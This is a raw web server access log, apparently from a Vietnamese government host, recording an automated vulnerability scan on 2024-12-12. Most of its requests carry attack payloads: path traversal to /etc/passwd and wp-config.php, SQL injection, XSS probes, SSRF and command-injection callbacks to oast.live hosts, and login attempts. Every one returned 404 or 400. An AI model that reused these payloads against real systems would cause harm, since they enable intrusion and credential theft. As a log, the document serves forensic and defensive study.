GET /_s_/dyn/Log_highlight href=../../../../windows/win.ini&n=1 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:95.0)+Gecko/20100101+Firefox/95.0 - 404 7 0 39 2024-12-12 21:48:08 103.153.214.94 POST /hmc/j_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/94.0.4606.81+Safari/537.36 - 404 7 0 208 2024-12-12 21:48:42 103.153.214.94 POST /userportal/Controller mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"} 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 36 2024-12-12 21:48:48 103.153.214.94 GET /wp-content/plugins/robotcpa/f.php l=ZmlsZTovLy9ldGMvcGFzc3dk 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML++like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 41 2024-12-12 21:48:54 103.153.214.94 GET /index.php s=/install/index/index 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:102.0)+Gecko/20100101+Firefox/102.0 - 404 7 0 32 2024-12-12 21:49:33 103.153.214.94 GET /nifi-api/process-groups/root - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 32 2024-12-12 21:49:38 103.153.214.94 GET /api/2.0/preview/mlflow/experiments/list - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 38 2024-12-12 21:49:59 103.153.214.94 GET /api/Image/withpath/C:/Windows/win.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 400 0 0 60 2024-12-12 21:51:03 103.153.214.94 GET /index.php id=50&file=../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36+Edge/15.15063 - 404 7 0 31 2024-12-12 21:51:19 103.153.214.94 GET /getFavicon host=http://oast.fun/ 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 59 2024-12-12 21:51:50 103.153.214.94 POST /ibmmq/console/j_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.6.19 https://bcvt.kontum.gov.vn:8172/ibmmq/console/login.html 404 7 0 201 2024-12-12 21:51:50 103.153.214.94 POST /ibmmq/console/j_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11_12)+AppleWebKit/618.17.9+(KHTML,+like+Gecko)+Version/17.4+Safari/618.17.9 https://bcvt.kontum.gov.vn:8172/ibmmq/console/login.html 404 7 0 198 2024-12-12 21:51:50 103.153.214.94 POST /ibmmq/console/j_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.79+Safari/537.36 https://bcvt.kontum.gov.vn:8172/ibmmq/console/login.html 404 7 0 206 2024-12-12 21:51:50 103.153.214.94 POST /0/Authenticate - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 208 2024-12-12 21:53:42 103.153.214.94 GET /install - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/98.0.4758.102+Safari/537.36 - 404 7 0 62 2024-12-12 21:53:42 103.153.214.94 GET /storage/logs/laravel.log - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 70 2024-12-12 21:53:56 103.153.214.94 POST /data/login - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/50.0.2661.75+Safari/537.36 - 404 7 0 198 2024-12-12 21:54:22 103.153.214.94 GET /ACSServer/WebServlet act=getMapImg_acs2&filename=../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 82 2024-12-12 21:54:27 103.153.214.94 GET /ACSServer/WebServlet act=getMapImg_acs2&filename=../../../../../../../windows/win.ini 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 404 7 0 37 2024-12-12 21:54:37 103.153.214.94 GET /config/development.sphinx.conf - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:83.0)+Gecko/20100101+Firefox/83.0 - 404 7 0 43 2024-12-12 21:54:42 103.153.214.94 GET /config/production.sphinx.conf - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 34 2024-12-12 21:54:46 103.153.214.94 GET /configs/sphinx.conf - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 44 2024-12-12 21:54:52 103.153.214.94 GET /search/configs/sphinx.conf - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/115.0.0.0+Safari/537.36 - 404 7 0 64 2024-12-12 21:54:56 103.153.214.94 GET /sphinx.conf - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 73 2024-12-12 21:55:00 103.153.214.94 GET /sphinx/sphinx.conf - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 32 2024-12-12 21:55:06 103.153.214.94 GET /sphinxsearch/sphinx.conf - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:80.0)+Gecko/20100101+Firefox/80.0 - 404 7 0 43 2024-12-12 21:55:24 103.153.214.94 GET /wp-content/themes/oxygen-theme/download.php file=../../../wp-config.php 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 47 2024-12-12 21:55:26 103.153.214.94 GET /api.php c=project&f=index&token=1234&id=news&sort=1+and+extractvalue(1,concat(0x7e,md5(999999999)))+--+ 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 59 2024-12-12 21:55:51 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 31 2024-12-12 21:55:53 103.153.214.94 GET /getCorsFile urlPath=aHR0cHM6Ly9vYXN0Lm1l 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 38 2024-12-12 21:55:54 103.153.214.94 GET /version.web - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/117.0.0.0+Safari/537.36 - 404 7 0 74 2024-12-12 21:55:54 103.153.214.94 GET /hp/device/webAccess/index.htm content=security 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 61 2024-12-12 21:57:15 103.153.214.94 GET /Http/webroot/config.json - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 21:57:21 103.153.214.94 GET /Electron/download/windows/windows/win.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.3.17 - 404 7 0 46 2024-12-12 21:57:31 103.153.214.94 GET /jsrpc.php type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 68 2024-12-12 21:57:33 103.153.214.94 GET /compliancepolicyelements.inc.php search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 41 2024-12-12 21:58:30 103.153.214.94 GET /v1/avatars/favicon url=http://ctcj3jjbclslbev4n7q0zsztkju1qf8p5.oast.live 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.8.24 - 404 7 0 73 2024-12-12 21:58:55 103.153.214.94 POST /sess-bin/login_handler.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.6.16 https://bcvt.kontum.gov.vn:8172/sess-bin/login_session.cgi 404 7 0 216 2024-12-12 21:59:41 103.153.214.94 GET /public/ticket/ajax/ajax.php action=getContacts&email=% 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 45 2024-12-12 21:59:48 103.153.214.94 GET /portal/attachment_downloadByUrlAtt.action filePath=file:///etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 39 2024-12-12 21:59:54 103.153.214.94 GET /api/v1/repos/search q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 57 2024-12-12 22:00:01 103.153.214.94 GET /cgi-bin/koha/svc/virtualshelves/search template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 40 2024-12-12 22:00:32 103.153.214.94 GET /jquery-file-upload/server/php/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_4)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/11.1+Safari/605.1.15 - 404 7 0 37 2024-12-12 22:00:56 103.153.214.94 GET /tmp/updateme/sinfor/ad/sys/sys_user.conf - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 41 2024-12-12 22:02:05 103.153.214.94 GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php ajax_path=../../../../../../../wp-config.php 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 61 2024-12-12 22:02:09 103.153.214.94 GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php ajax_path=/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 70 2024-12-12 22:02:13 103.153.214.94 GET /AvalancheWeb/image imageFilePath=C:/windows/win.ini 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 52 2024-12-12 22:03:15 103.153.214.94 POST /login/index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.51 https://bcvt.kontum.gov.vn:8172/login/ 404 7 0 198 2024-12-12 22:03:15 103.153.214.94 GET /sites/web_vhost_domain_list.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.20 https://bcvt.kontum.gov.vn:8172/index.php 404 7 0 200 2024-12-12 22:03:15 103.153.214.94 GET /sites/web_vhost_domain_list.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/index.php 404 7 0 198 2024-12-12 22:03:16 103.153.214.94 POST /login/index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:88.0)+Gecko/20100101+Firefox/88.0 https://bcvt.kontum.gov.vn:8172/login/ 404 7 0 199 2024-12-12 22:03:16 103.153.214.94 GET /login - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.2+Safari/605.1.15 - 404 7 0 204 2024-12-12 22:03:16 103.153.214.94 GET /login - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 208 2024-12-12 22:03:16 103.153.214.94 GET /sites/web_vhost_domain_list.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.25 https://bcvt.kontum.gov.vn:8172/index.php 404 7 0 212 2024-12-12 22:03:16 103.153.214.94 POST /login/index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/110.0 https://bcvt.kontum.gov.vn:8172/login/ 404 7 0 221 2024-12-12 22:03:16 103.153.214.94 GET /login - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Safari/537.36 - 404 7 0 238 2024-12-12 22:04:04 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.2;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 36 2024-12-12 22:04:08 103.153.214.94 GET /main/install/index.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.24 - 404 7 0 33 2024-12-12 22:04:29 103.153.214.94 GET /git/notifyCommit url=2q3kZ8KPhxsQzoNfIYweUTaaFIo&branches=2q3kZ8KPhxsQzoNfIYweUTaaFIo 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 59 2024-12-12 22:04:58 103.153.214.94 GET /login - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.24 - 404 7 0 212 2024-12-12 22:05:45 103.153.214.94 GET /modules/simpleimportproduct/send.php phpinfo=1 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 39 2024-12-12 22:05:51 103.153.214.94 GET /modules/updateproducts/send.php phpinfo=1 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 35 2024-12-12 22:06:25 103.153.214.94 GET /var/resource_config.json - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 36 2024-12-12 22:06:25 103.153.214.94 GET /main/calendar/agenda_list.php type=xss"+onmouseover=alert(document.domain)+" 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 55 2024-12-12 22:06:59 103.153.214.94 GET /index.php ids[0,updatexml(0,concat(0xa,user()),0)]=1 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.5)+AppleWebKit/618.3.5+(KHTML,+like+Gecko)+Version/17.4+Safari/618.3.5 - 404 7 0 39 2024-12-12 22:06:59 103.153.214.94 GET /components/com_moofaq/includes/file_includer.php gzip=0&file=/../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.5)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 33 2024-12-12 22:08:38 103.153.214.94 POST /content.php - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 218 2024-12-12 22:08:45 103.153.214.94 GET /system/deviceInfo auth=YWRtaW46MTEK 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 57 2024-12-12 22:08:45 103.153.214.94 GET /api/moduleInformation - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Gecko/20100101+Firefox/128.0+(x64+de) - 404 7 0 31 2024-12-12 22:09:52 103.153.214.94 GET /index.php/System/MailConnect/host/ctcj3jjbclslbev4n7q03acathgmo4a5x.oast.live/port/80/secure/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 404 7 0 42 2024-12-12 22:10:33 103.153.214.94 GET /upload/setup/install.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_5)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 38 2024-12-12 22:10:37 103.153.214.94 GET /setup/install.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/112.0 - 404 7 0 32 2024-12-12 22:10:38 103.153.214.94 GET /weaver/org.springframework.web.servlet.ResourceServlet resource=/WEB-INF/web.xml 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 31 2024-12-12 22:11:04 103.153.214.94 GET /cgi-bin/admin.cgi Command=sysCommand&Cmd=ping${IFS}-c${IFS}1${IFS}ctcj3jjbclslbev4n7q0xp9ortf8tquyk.oast.live 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/617.18+(KHTML,+like+Gecko)+Version/17.4+Safari/617.18 - 404 7 0 39 2024-12-12 22:11:04 103.153.214.94 GET /UserSelect/ - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 42 2024-12-12 22:11:05 103.153.214.94 GET /wp-content/themes/diarise/download.php calendar=file:///etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.130+Safari/537.36 - 404 7 0 32 2024-12-12 22:11:33 103.153.214.94 POST /jbpm-console/app/j_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 196 2024-12-12 22:11:33 103.153.214.94 GET /jbpm-console/app/tasks.jsf - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 22:11:33 103.153.214.94 POST /jbpm-console/app/j_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:104.0)+Gecko/20100101+Firefox/104.0 - 404 7 0 200 2024-12-12 22:11:33 103.153.214.94 GET /jbpm-console/app/tasks.jsf - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 22:11:33 103.153.214.94 GET /jbpm-console/app/tasks.jsf - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.9.21 - 404 7 0 202 2024-12-12 22:11:33 103.153.214.94 POST /jbpm-console/app/j_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 404 7 0 208 2024-12-12 22:11:33 103.153.214.94 POST /jbpm-console/app/j_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/102.0.0.0+Safari/537.36 - 404 7 0 209 2024-12-12 22:11:33 103.153.214.94 GET /jbpm-console/app/tasks.jsf - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_4)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 208 2024-12-12 22:11:33 103.153.214.94 GET /jbpm-console/app/tasks.jsf - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.2;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 212 2024-12-12 22:11:33 103.153.214.94 GET /jbpm-console/app/tasks.jsf - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.12;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 219 2024-12-12 22:11:33 103.153.214.94 GET /jbpm-console/app/tasks.jsf - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 225 2024-12-12 22:11:33 103.153.214.94 GET /jbpm-console/app/tasks.jsf - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 214 2024-12-12 22:11:36 103.153.214.94 GET /wp-content/themes/mTheme-Unus/css/css.php files=../../../../wp-config.php 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+WOW64;+rv:41.0)+Gecko/20100101+Firefox/127.0.2+(x64+de) - 404 7 0 39 2024-12-12 22:11:43 103.153.214.94 GET /topic/e'"><img+src=x+onerror=alert(2)> - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 400 0 0 42 2024-12-12 22:12:37 103.153.214.94 GET /compliancepolicies.inc.php search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:55.0)+Gecko/20100101+Firefox/55.0 - 404 7 0 49 2024-12-12 22:12:50 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/618.2.7+(KHTML,+like+Gecko)+Version/17.5+Safari/618.2.7 - 404 7 0 54 2024-12-12 22:13:14 103.153.214.94 GET /api/v1/confup mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();-- 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/618.31.14+(KHTML,+like+Gecko)+Version/17.7+Safari/618.31.14 - 404 7 0 34 2024-12-12 22:15:27 103.153.214.94 GET /login/forgetpswd.php loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 22:17:21 103.153.214.94 GET /cgi-bin/login LD_DEBUG=files 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 55 2024-12-12 22:17:23 103.153.214.94 GET /pipeline/apis/v1beta1/runs page_size=5&sort_by=created_at%20desc 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/617.7+(KHTML,+like+Gecko)+Version/17.3.74+Safari/617.7 - 404 7 0 37 2024-12-12 22:17:27 103.153.214.94 GET /hax/..CFIDE/wizards/common/utils.cfc method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 5 0 72 2024-12-12 22:17:52 103.153.214.94 GET /package.json - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 22:17:54 103.153.214.94 GET /oliver/FileServlet source=serverFile&fileName=c:/windows/win.ini 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.2.21 - 404 7 0 39 2024-12-12 22:17:58 103.153.214.94 GET /xwiki/bin/get/Main/DatabaseSearch 